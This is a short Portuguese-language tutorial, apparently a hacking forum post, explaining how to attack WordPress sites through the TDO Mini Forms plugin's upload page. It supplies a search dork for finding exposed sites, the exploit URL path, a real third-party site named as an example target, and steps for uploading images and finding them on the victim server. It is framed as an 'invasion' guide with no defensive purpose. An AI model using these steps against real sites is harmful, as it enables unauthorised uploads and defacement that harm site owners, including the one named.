Wordpress Upload Images

Eae galera, bem vamos intender uma invasão " WordPress Upload Images " ??
Intão vamos lá :

Vá no google e busque esse código:
plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1?

Exploit:
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index
Depois vai aparecer vários sites , mais nem todos os sites são vulneráveis a isso..
Um exemplo de link:
http://www.thanksjon.ca/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index

Lá vai ter:
------------------------
| Max File Size: 3 MB
Allowable File Types: .jpg .gif
|
--------------------------------------
Ou seja , você vai poder adicionar imagens do tipo, JPG ou GIF ( Nem todos os sites são esses dois) 

Se aparecer o nome dá imagem feita irá ser assim "FOTO.jpg (221 KB) Uploaded " , é porque a imagem foi , então como irá ficar?

Exemplo: http://www.thanksjon.ca/wp-content/uploads/tdomf/tmp/1/SEUIPAQUI/ONOMEDASUAIMAGEMAQUI.jpg

Depois é só checar se upou a imagem !